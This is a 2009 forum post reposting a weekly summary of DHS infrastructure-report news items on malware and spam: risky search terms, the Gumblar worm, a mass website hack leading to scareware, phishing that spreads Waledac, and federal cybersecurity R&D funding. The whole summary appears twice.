|
|
06-07-2009
Registered User
26,240,
27
Weekly Summary of the "DHS Daily Open Source Infrastructure Report"
The DHS Daily Open SourceInfrastructure Report covers the publicly reported material for the precedingday(s) not previously covered. This weekly summary provides a selectionof those items of greatest significance to the InfoSec professional.
Daily Open Source Infrastructure Report for1June 2009
PerhapsYou Should Consider Blocking Some Search Terms!
25. May 28, SC Magazine - (International) McAfeedocuments riskiest search terms. A McAfee study into 2,600 of the mostpopular keyword searches on the web has concluded that hunts for “screensavers”present the most risk. The report released the week of May 25 shows that userswho search for “screensavers” have a 59.1 percent chance that they will beinfected by malware on a given page of results. By category, the most dangeroussearches involved keywords containing the word “lyrics” (26.3 percent risk) and“free” (21.3 percent). The safest category searches, meanwhile, related to“health” (four percent) and the “economic crisis” (3.5 percent). The reportalso warned of the risk generated by searching for information on “work fromhome.” Variations of this search term - considered more popular than ever,given the state of the economy - ranged from a 6.3 percent-risk to a 40percent-risk of infection. Source: http://www.scmagazineus.com/McAfee-d...rticle/137632/
Daily Open Source Infrastructure Report for 2June 2009
Are You Prepared for the LatestCorporate Spamming Techniques?
26. June 1, Computerworld - (International) Spammersfind new ways to flood corporate networks. Unsolicited e-mail accounted for90.4 percent of all messages received on corporate networks during April, anincrease of 5.1 percent from a month earlier, according to a report releasedMay 26 by Symantec Corp.'s MessageLabs Intelligence unit. The monthlyMessageLabs report on threat trends also found that nearly 58 percent of all spamcan be traced to botnets. A researcher at Cloudmark Inc., a provider ofantispam tools, noted that in addition to using botnets, spammers in recentmonths have been experimenting with a new way to sneak unwanted email pastcorporate filters. Often, he said, a spammer will rent legitimate networkservices, often in an Eastern European country, and then blast a large amountof spam at the network of a specific ISP. The idea is to push as many messagesas possible onto the network before any kind of filtering software detects theincident. The researcher estimates that hundreds of thousands of such messagesare sent each day without detection. Source: http://www.computerworld.com/action/...&intsrc=kc_top
Daily Open Source Infrastructure Report for 3June 2009
Isthere a “Gumblar” in your future?
32. June 2, CNET News - (International) Thoughtthe Conficker virus was bad? Gumblar is even worse. ScanSafe, a computersecurity firm, has been tracking the progress of the worm since its arrival onthe scene in March, according to CNET. Originally, the attack spread throughinfectious code that was planted in hacked Web sites and then downloadedmalware from the gumblar.cn domain on to victims' computers. But that was justthe opening salvo. As Web site operators cleaned their pages of the code,Gumblar replaced the original material with dynamically generated Javascript(Web site code that is created on the spot instead of being completely determinedbeforehand - a key element of Web apps like Gmail) that is much harder forsecurity software to detect and remove. The evolved version also went aboutadding new domains to the list of sources for downloading its malware payload,including liteautotop.cn and autobestwestern.cn, and began exploiting securityholes in Flash and Adobe Reader. The worm also searches out credentials for FTPservers (a method for uploading files to a Web site) on a victim's computer,using them to infect additional Web sites. It is not clear how many sitesGumblar has infected, but security firms seem to agree that it accounts forabout 40 percent of all new malware infections right now. According to ScanSafein just the first two weeks of May over 3,000 Web sites were compromised andspreading the worm. Most sites have been quick to clean up the infections asbest they can, but, even if all the infected pages were removed, Gumblar wouldstill have an army of infected PCs to inflict further damage. Source: http://www.switched.com/2009/06/02/t...-meet-gumblar/
Daily Open Source Infrastructure Report for 4June 2009
Has one of the sites for which youare responsible been compromised?
35. June2, IDG News Service - (International) Thousands of Web sitesstung by mass hacking attack.As many as 40,000 Web sites have been hackedto redirect unwitting victims to another Web site that tries to infect PCs withmalicious software, according to security vendor Websense. The affected siteshave been hacked to host JavaScript code that directs people to a fake GoogleAnalytics Web site, which provides data for Web site owners on a site's usage,then to another bad site, said the threat research manager for Websense. ThoseWeb sites have likely been hacked via a SQL injection attack, in whichimproperly configured Web applications accept malicious data and get hacked,the researcher said. Another possibility is that the FTP credentials for thesites have somehow been obtained by hackers, giving them access to the innerworkings of the site. It appears the hackers are using automated tools to seekout vulnerable Web sites, the researcher said. The latest campaign underscoresthe success hackers have at hosting dangerous code on poorly secured Web sites.Once a user has been directed to the bogus Google analytics site, it redirectsagain to another malicious domain. That site tests to see if the PC hassoftware vulnerabilities in either Microsoft Corp.'s Internet Explorer browseror Firefox that can be exploited in order to deliver malware, the researchersaid. If it does not find a problem there, it will launch a fake warning sayingthe computer is infected with malware and then try to get the user to willinglydownload a program that purports to be security software but is actually aTrojan downloader, he said. The fake security programs are often called“scareware” and do not work as advertised. As of May 29, only four of 39security software programs could detect that Trojan, although that is nowlikely changed as vendors such as Websense swap malware samples with othercompanies in order to improve overall Internet security. Source: http://www.computerworld.com/action/article.do?command=viewArticleBasic&taxonomyName=security&articleId=9133820&taxonomyId=17&intsrc=kc_ topSee also: http://news.cnet.com/8301-1009_3-10255226-83.html
Daily Open Source Infrastructure Report for 5June 2009
Will U.S. Government investment inCyber Security help solve problems?
37. June 3, Congress Daily - (National) ObamaAdministration begins work on cybersecurity R&D. Maximizing governmentinvestment in federal cybersecurity research and development is a majorcomponent of the U.S. President's plan to bolster defenses against high-techattacks. If the White House's new cyber strategy and key agencies' fiscal 2010budget requests are any indication, they are off to a solid start. In the nearterm, the White House's unnamed cyber czar will be charged with developing a frameworkfor R&D strategies that focus on “game-changing technologies” and providethe research community access to event data to help develop tools and testingtheories, according to the May 29 report, which stemmed from a 60-day review.That czar will eventually develop threat scenarios and metrics for riskmanagement decisions, recovery planning and R&D prioritization. “Researchon new approaches to achieving security and resiliency in information andcommunications infrastructures is insufficient,” the report stated. “Thegovernment needs to increase investment in research that will help addresscybersecurity vulnerabilities while also meeting our economic needs andnational security requirements.” The President proposed a $37.2 million cyberR&D budget for DHS in fiscal 2010 to support operations in its nationalcybersecurity division as well as projects within the CNCI. DHS is using muchof its fiscal 2009 allotment to deploy Einstein, a system to analyze civilianagencies' systems for cyber threats and intrusions. Source: http://www.nextgov.com/nextgov/ng_20090603_2540.php
Perhapssomething like this?
11. June 2, SC Magazine - (National) Bank ofAmerica certificate scam propagating Waledac, Virut. A new spam campaigndisguised as a Bank of America email telling users they need to update theirdigital certificate is attempting to lure users into installing the Waledacworm. The messages, which first started being detected recently, seemingly comefrom Bank of America, and tell users, “The digital certificate for your Bank ofAmerica direct online account has expired. You need to update the certificateusing Bank of America direct digital certificate updating procedure.”Recipients are then instructed to click on a link and follow the giveninstructions, the lead threat analyst at web and email security firm Marshal8e6told SCMagazineUS.com in an email on June 1. The spam originates from thePushdo botnet, which has been active in similar malicious phishing attacks, theanalyst said. After following the link, the user is encouraged to fill in a webform, and to download a new “digital certificate” to continue, the analystsaid. The “certificate” however, is an executable file which seeks to downloadmalware to the victim's PC. The SANS Internet Storm center said in a post onJune 1 that a quick analysis of this malware showed “probable signs” ofWaledac, the notorious worm capable of harvesting and forwarding passwordinformation and receiving commands from a remote server. A threat researcherfor Panda Security confirmed to SCMagazineUS.com on June 2 that the threat isbeing detected as Waledac. Source: http://www.scmagazineus.com/Bank-of-...rticle/137848/
Note: The DHS only maintains the last ten daysof their reports online. To obtain copies of earlier reports or completesummaries, go to:
More...
Week Ending: Friday, June 5, 2009
Daily Open Source Infrastructure Report for1June 2009
PerhapsYou Should Consider Blocking Some Search Terms!
25. May 28, SC Magazine - (International) McAfeedocuments riskiest search terms. A McAfee study into 2,600 of the mostpopular keyword searches on the web has concluded that hunts for “screensavers”present the most risk. The report released the week of May 25 shows that userswho search for “screensavers” have a 59.1 percent chance that they will beinfected by malware on a given page of results. By category, the most dangeroussearches involved keywords containing the word “lyrics” (26.3 percent risk) and“free” (21.3 percent). The safest category searches, meanwhile, related to“health” (four percent) and the “economic crisis” (3.5 percent). The reportalso warned of the risk generated by searching for information on “work fromhome.” Variations of this search term - considered more popular than ever,given the state of the economy - ranged from a 6.3 percent-risk to a 40percent-risk of infection. Source: http://www.scmagazineus.com/McAfee-d...rticle/137632/
Daily Open Source Infrastructure Report for 2June 2009
Are You Prepared for the LatestCorporate Spamming Techniques?
26. June 1, Computerworld - (International) Spammersfind new ways to flood corporate networks. Unsolicited e-mail accounted for90.4 percent of all messages received on corporate networks during April, anincrease of 5.1 percent from a month earlier, according to a report releasedMay 26 by Symantec Corp.'s MessageLabs Intelligence unit. The monthlyMessageLabs report on threat trends also found that nearly 58 percent of all spamcan be traced to botnets. A researcher at Cloudmark Inc., a provider ofantispam tools, noted that in addition to using botnets, spammers in recentmonths have been experimenting with a new way to sneak unwanted email pastcorporate filters. Often, he said, a spammer will rent legitimate networkservices, often in an Eastern European country, and then blast a large amountof spam at the network of a specific ISP. The idea is to push as many messagesas possible onto the network before any kind of filtering software detects theincident. The researcher estimates that hundreds of thousands of such messagesare sent each day without detection. Source: http://www.computerworld.com/action/...&intsrc=kc_top
Daily Open Source Infrastructure Report for 3June 2009
Isthere a “Gumblar” in your future?
32. June 2, CNET News - (International) Thoughtthe Conficker virus was bad? Gumblar is even worse. ScanSafe, a computersecurity firm, has been tracking the progress of the worm since its arrival onthe scene in March, according to CNET. Originally, the attack spread throughinfectious code that was planted in hacked Web sites and then downloadedmalware from the gumblar.cn domain on to victims' computers. But that was justthe opening salvo. As Web site operators cleaned their pages of the code,Gumblar replaced the original material with dynamically generated Javascript(Web site code that is created on the spot instead of being completely determinedbeforehand - a key element of Web apps like Gmail) that is much harder forsecurity software to detect and remove. The evolved version also went aboutadding new domains to the list of sources for downloading its malware payload,including liteautotop.cn and autobestwestern.cn, and began exploiting securityholes in Flash and Adobe Reader. The worm also searches out credentials for FTPservers (a method for uploading files to a Web site) on a victim's computer,using them to infect additional Web sites. It is not clear how many sitesGumblar has infected, but security firms seem to agree that it accounts forabout 40 percent of all new malware infections right now. According to ScanSafein just the first two weeks of May over 3,000 Web sites were compromised andspreading the worm. Most sites have been quick to clean up the infections asbest they can, but, even if all the infected pages were removed, Gumblar wouldstill have an army of infected PCs to inflict further damage. Source: http://www.switched.com/2009/06/02/t...-meet-gumblar/
Daily Open Source Infrastructure Report for 4June 2009
Has one of the sites for which youare responsible been compromised?
35. June2, IDG News Service - (International) Thousands of Web sitesstung by mass hacking attack.As many as 40,000 Web sites have been hackedto redirect unwitting victims to another Web site that tries to infect PCs withmalicious software, according to security vendor Websense. The affected siteshave been hacked to host JavaScript code that directs people to a fake GoogleAnalytics Web site, which provides data for Web site owners on a site's usage,then to another bad site, said the threat research manager for Websense. ThoseWeb sites have likely been hacked via a SQL injection attack, in whichimproperly configured Web applications accept malicious data and get hacked,the researcher said. Another possibility is that the FTP credentials for thesites have somehow been obtained by hackers, giving them access to the innerworkings of the site. It appears the hackers are using automated tools to seekout vulnerable Web sites, the researcher said. The latest campaign underscoresthe success hackers have at hosting dangerous code on poorly secured Web sites.Once a user has been directed to the bogus Google analytics site, it redirectsagain to another malicious domain. That site tests to see if the PC hassoftware vulnerabilities in either Microsoft Corp.'s Internet Explorer browseror Firefox that can be exploited in order to deliver malware, the researchersaid. If it does not find a problem there, it will launch a fake warning sayingthe computer is infected with malware and then try to get the user to willinglydownload a program that purports to be security software but is actually aTrojan downloader, he said. The fake security programs are often called“scareware” and do not work as advertised. As of May 29, only four of 39security software programs could detect that Trojan, although that is nowlikely changed as vendors such as Websense swap malware samples with othercompanies in order to improve overall Internet security. Source: http://www.computerworld.com/action/article.do?command=viewArticleBasic&taxonomyName=security&articleId=9133820&taxonomyId=17&intsrc=kc_ topSee also: http://news.cnet.com/8301-1009_3-10255226-83.html
Daily Open Source Infrastructure Report for 5June 2009
Will U.S. Government investment inCyber Security help solve problems?
37. June 3, Congress Daily - (National) ObamaAdministration begins work on cybersecurity R&D. Maximizing governmentinvestment in federal cybersecurity research and development is a majorcomponent of the U.S. President's plan to bolster defenses against high-techattacks. If the White House's new cyber strategy and key agencies' fiscal 2010budget requests are any indication, they are off to a solid start. In the nearterm, the White House's unnamed cyber czar will be charged with developing a frameworkfor R&D strategies that focus on “game-changing technologies” and providethe research community access to event data to help develop tools and testingtheories, according to the May 29 report, which stemmed from a 60-day review.That czar will eventually develop threat scenarios and metrics for riskmanagement decisions, recovery planning and R&D prioritization. “Researchon new approaches to achieving security and resiliency in information andcommunications infrastructures is insufficient,” the report stated. “Thegovernment needs to increase investment in research that will help addresscybersecurity vulnerabilities while also meeting our economic needs andnational security requirements.” The President proposed a $37.2 million cyberR&D budget for DHS in fiscal 2010 to support operations in its nationalcybersecurity division as well as projects within the CNCI. DHS is using muchof its fiscal 2009 allotment to deploy Einstein, a system to analyze civilianagencies' systems for cyber threats and intrusions. Source: http://www.nextgov.com/nextgov/ng_20090603_2540.php
Perhapssomething like this?
11. June 2, SC Magazine - (National) Bank ofAmerica certificate scam propagating Waledac, Virut. A new spam campaigndisguised as a Bank of America email telling users they need to update theirdigital certificate is attempting to lure users into installing the Waledacworm. The messages, which first started being detected recently, seemingly comefrom Bank of America, and tell users, “The digital certificate for your Bank ofAmerica direct online account has expired. You need to update the certificateusing Bank of America direct digital certificate updating procedure.”Recipients are then instructed to click on a link and follow the giveninstructions, the lead threat analyst at web and email security firm Marshal8e6told SCMagazineUS.com in an email on June 1. The spam originates from thePushdo botnet, which has been active in similar malicious phishing attacks, theanalyst said. After following the link, the user is encouraged to fill in a webform, and to download a new “digital certificate” to continue, the analystsaid. The “certificate” however, is an executable file which seeks to downloadmalware to the victim's PC. The SANS Internet Storm center said in a post onJune 1 that a quick analysis of this malware showed “probable signs” ofWaledac, the notorious worm capable of harvesting and forwarding passwordinformation and receiving commands from a remote server. A threat researcherfor Panda Security confirmed to SCMagazineUS.com on June 2 that the threat isbeing detected as Waledac. Source: http://www.scmagazineus.com/Bank-of-...rticle/137848/
Note: The DHS only maintains the last ten daysof their reports online. To obtain copies of earlier reports or completesummaries, go to:
More...